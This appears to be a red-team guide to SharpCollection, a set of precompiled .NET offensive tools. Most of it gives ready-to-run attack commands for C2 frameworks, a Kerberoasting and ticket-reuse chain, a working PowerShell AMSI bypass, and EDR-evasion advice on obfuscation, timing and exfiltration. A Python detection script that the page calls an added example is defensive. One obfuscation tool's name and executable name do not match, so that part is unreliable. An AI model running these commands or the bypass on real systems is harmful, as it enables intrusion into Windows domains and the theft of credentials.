SharpCollection
SharpCollection is a curated repository of pre-compiled .NET offensive security tools maintained by Flangvik, providing ready-to-use binaries for post-exploitation and red team operations. Rather than compiling tools on target systems, operators can download pre-built versions that are consistent, tested, and optimized for various .NET Framework versions.
Overview
SharpCollection consolidates tools from GhostPack (by harmj0y and team) and community-developed .NET red team utilities into a single repository with nightly builds. The pre-compiled approach offers significant advantages:
- Speed: No compilation time on target systems
- Consistency: Verified working versions across different environments
- Flexibility: Multiple .NET Framework versions available (4.0, 4.5, 4.7)
- Accessibility: Pre-compiled binaries reduce dependencies and complexity
The repository is hosted on GitHub and includes tools for Kerberos exploitation, Active Directory enumeration, privilege escalation, browser credential extraction, and more.
Download and Setup
Clone the SharpCollection repository to your attack machine:
git clone https://github.com/Flangvik/SharpCollection.git
cd SharpCollection
ls -la
The repository structure is organized by .NET Framework version:
SharpCollection/
├── NetFramework_4.0_Any/
├── NetFramework_4.5_Any/
├── NetFramework_4.7_Any/
└── README.md
Each directory contains pre-compiled binaries for different target .NET versions. Explore available tools:
ls -lh NetFramework_4.7_Any/
Included Tools Reference
| Tool | Category | Purpose |
|---|---|---|
| Rubeus | Kerberos | Kerberos ticket manipulation, ASREPRoasting, Kerberoasting, ticket renewal |
| Seatbelt | Enumeration | Local enumeration (OS, patches, antivirus, processes, network, services) |
| SharpUp | Privilege Escalation | Windows privilege escalation vector enumeration |
| Certify | Active Directory CS | Active Directory Certificate Services enumeration and exploitation |
| SharpHound | Reconnaissance | BloodHound data collector for Active Directory visualization |
| SharpDPAPI | Data Protection | DPAPI credential dumping and decryption |
| SharpChrome | Credential Extraction | Extract credentials and cookies from Chrome, Edge, Brave |
| SharpView | Active Directory | PowerView-like AD enumeration and recon |
| SharpRDP | Remote Access | RDP session enumeration and reconnaissance |
| SharpWMI | WMI Queries | WMI-based system enumeration and lateral movement |
| SharpGPOAbuse | GPO Abuse | Group Policy manipulation for privilege escalation |
| StandIn | AD Manipulation | Direct LDAP-based Active Directory modifications |
| SharpLAPS | LAPS | LAPS password extraction and enumeration |
| Snaffler | File Enumeration | High-speed file share scanning and classification |
| ADCSPwn | AD CS Exploitation | Automated Active Directory Certificate Services abuse |
| KrbRelay | Kerberos Relay | Kerberos relay attacks for lateral movement |
| SharpSCCM | SCCM Exploitation | SCCM environment enumeration and abuse |
| Whisker | Shadow Credentials | Create Shadow Credentials for AD accounts |
Basic Usage with C2 Frameworks
Cobalt Strike
Execute pre-compiled tools via Cobalt Strike’s execute-assembly:
execute-assembly C:\path\to\Seatbelt.exe -group=system
execute-assembly C:\path\to\Rubeus.exe kerberoast /outfile=roasts.txt
execute-assembly C:\path\to\SharpHound.exe -c All
execute-assembly C:\path\to\Certify.exe find /vulnerable
Upload tools to target:
cd NetFramework_4.5_Any
upload Seatbelt.exe
upload Rubeus.exe
upload SharpUp.exe
Covenant
Execute via Covenant’s assembly execution:
Assembly /path/to/Seatbelt.exe -group=user
Assembly /path/to/Rubeus.exe tgtdeleg
Sliver
Use Sliver’s execute command:
execute C:\Tools\Seatbelt.exe -group=services
execute C:\Tools\SharpUp.exe audit
.NET Framework Version Selection
Choose the correct binary for your target’s .NET Framework version:
| Version | Path | Compatibility | Notes |
|---|---|---|---|
| 4.0 | NetFramework_4.0_Any/ | Widest | Older Windows (Server 2008 R2, Windows 7) |
| 4.5 | NetFramework_4.5_Any/ | Most Common | Windows 8+, Server 2012+ |
| 4.7 | NetFramework_4.7_Any/ | Modern | Windows 10, Server 2016+ |
Determine target .NET version via PowerShell:
# Check installed .NET Framework versions
reg query 'HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP' /s
# Or use this command:
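Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse |
Get-ItemProperty -Name Version -ErrorAction SilentlyContinue |
Select-Object PSChildName, Version
Using the dotnet binary (this reports the installed .NET SDK version, not the .NET Framework version):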
dotnet --version
When in doubt, use NetFramework_4.5_Any as it covers most modern Windows systems.
OPSEC Considerations
Hash-Based Detection
Known SharpCollection binaries are detected by EDR and antivirus solutions. Always assume hashes are catalogued:
- Never use pre-compiled binaries without modification
- Modify source and recompile for your environment
- Use binary obfuscation techniques
Obfuscation Methods
Obfuscate binaries with ConfuserEx:
# Install ConfuserEx (on Windows with .NET)
# Download from: confusex.codeplex.com or use alternatives
# Using InvisibilityCloak (command-line option):
InvisibilityCloak.exe -i Seatbelt.exe -o Seatbelt_obf.exe
Or use Semantic Insignificance Framework:
SemanticInformationFramework.exe input.exe output.exe
AMSI Evasion
Pre-compiled tools may trigger AMSI. Bypass techniques:
# Disable AMSI in-memory (if unpatched):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Then execute:
.\Seatbelt.exe -group=user
Alternatively, host binaries over HTTP or load via living-off-the-land techniques.
Building from Source
If pre-compiled binaries are blocked, build from source:
- Clone GhostPack repositories:
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
- Build with Visual Studio:
Open the .sln file in Visual Studio and build the solution, or use the dotnet CLI:
dotnet build -c Release
- Output binary location:
Rubeus/bin/Release/Rubeus.exe
Compiling on target systems is slower but may evade binary scanning.
Useful Tool Combinations
Kerberos Attack Chain
# 1. Find roastable users
Rubeus.exe kerberoast /format:hashcat
# 2. Extract TGT for delegation
Rubeus.exe tgtdeleg
# 3. Use ticket for lateral movement
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /ticket:[base64]
Post-Exploitation Enumeration
# 1. General system info
Seatbelt.exe -group=system
# 2. Find privilege escalation paths
SharpUp.exe audit
# 3. Check for LAPS passwords
SharpLAPS.exe
# 4. Enumerate AD Certificate Services
Certify.exe find /vulnerable
BloodHound Data Collection
SharpHound.exe -c All
SharpHound.exe -c All --ldapusername domain.com\user --ldappassword password
SharpHound.exe -c All --zipfilename output.zip
Troubleshooting
Binary Won’t Execute
Issue: Access is denied or binary fails to run
Solutions:
- Verify correct .NET Framework version for target
- Check file permissions
- Bypass execution policy:
powershell -ExecutionPolicy Bypass -File script.ps1
- Execute via rundll32 or other LOLBins if direct execution blocked
Tool-Specific Errors
Seatbelt fails on enumeration:
# Run with specific group only
Seatbelt.exe -group=system
Rubeus requires administrative context:
# Certain Rubeus commands require admin
# Check execution context first
whoami /groups
SharpHound connection issues:
# Specify LDAP server explicitly
SharpHound.exe -d domain.com -s dc1.domain.com -c All
Best Practices
- Version Control: Track which binary version you’re using and document results
- Selective Execution: Run only tools needed for your operation (reduces detection surface)
- Output Handling: Redirect output to files and exfiltrate safely
- Timing: Space out tool execution to avoid behavioral detection
- Cleanup: Remove tools from target after use
- Source Builds: For critical operations, build tools from source to avoid known-hash detection
- Testing: Test obfuscated/modified binaries in lab before operational use
- Logging: Monitor target Windows Event Logs for tool execution indicators
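From the defender's side, the command lines shown throughout this page are themselves execution indicators in process-creation logs. The following is an added example, not part of the original page or of SharpCollection: it matches those arguments against constructed events that use the Sysmon Event ID 1 field names `Image` and `CommandLine`; the rule names and sample events are made up for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# (rule name, expected image name, argument pattern). Patterns are taken from
# the invocations shown on this page; the rule names are invented here.
RULES = [
    ("rubeus_kerberoast", "rubeus.exe", r"\bkerberoast\b"),
    ("rubeus_tgtdeleg", "rubeus.exe", r"\btgtdeleg\b"),
    ("rubeus_createnetonly", "rubeus.exe", r"\bcreatenetonly\b.*/program:"),
    ("seatbelt_group", "seatbelt.exe", r"-group=(system|user|services)\b"),
    ("sharpup_audit", "sharpup.exe", r"\baudit\b"),
    ("certify_find", "certify.exe", r"\bfind\b.*/vulnerable\b"),
    ("sharphound_all", "sharphound.exe", r"-c\s+all\b"),
]
# Arguments too generic to alert on unless the image name also matches.
NAME_REQUIRED = {"sharpup_audit", "sharphound_all"}

def classify(event):
    """Return (rule, confidence) pairs for one process-creation event."""
    image = basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    for name, expected, pattern in RULES:
        if not re.search(pattern, cmdline, re.IGNORECASE):
            continue
        if image == expected:
            hits.append((name, "high"))
        elif name not in NAME_REQUIRED:
            # Distinctive arguments under another file name: renamed binary.
            hits.append((name, "medium"))
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\Seatbelt.exe", "CommandLine": r"C:\Tools\Seatbelt.exe -group=services"},
    {"Image": r"C:\Users\Public\Seatbelt_obf.exe", "CommandLine": r"Seatbelt_obf.exe -group=user"},
    {"Image": r"C:\Temp\svc.exe", "CommandLine": r"svc.exe kerberoast /format:hashcat"},
    {"Image": r"C:\Temp\SharpHound.exe", "CommandLine": r"SharpHound.exe -c All --zipfilename output.zip"},
    {"Image": r"C:\Program Files\Git\usr\bin\grep.exe", "CommandLine": r"grep -c all notes.txt"},
]

def scan(events):
    """Return (event index, rule, confidence) for every hit in the batch."""
    return [(i, r, c) for i, e in enumerate(events) for r, c in classify(e)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Command-line rules only see processes started from disk; assemblies loaded in memory by a C2 agent leave no such command line, so pair this with .NET assembly-load and module-load telemetry.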
Related Tools and Alternatives
Source Repositories
- GhostPack: harmj0y’s original tool suite (Rubeus, Seatbelt, SharpUp)
- BloodHound-CE: Community Edition for AD visualization
- PowerView/PowerUp: PowerShell versions of enumeration and exploitation tools
Language Alternatives
- Beacon Object Files (BOF): Faster execution in memory via Cobalt Strike
- Nim/C2: Rewrite tools in Nim for .NET avoidance
- Go Binaries: Cross-platform alternatives (winrm-go, ldap-go)
Detection Evasion
- ConfuserEx: Obfuscate .NET binaries
- InvisibilityCloak: String encryption and code obfuscation
- NetLoader: Load assemblies directly into memory
References
- SharpCollection GitHub: Maintained nightly builds
- GhostPack Suite: Original security research and tools
- Active Directory exploitation techniques
- .NET Framework documentation for version compatibility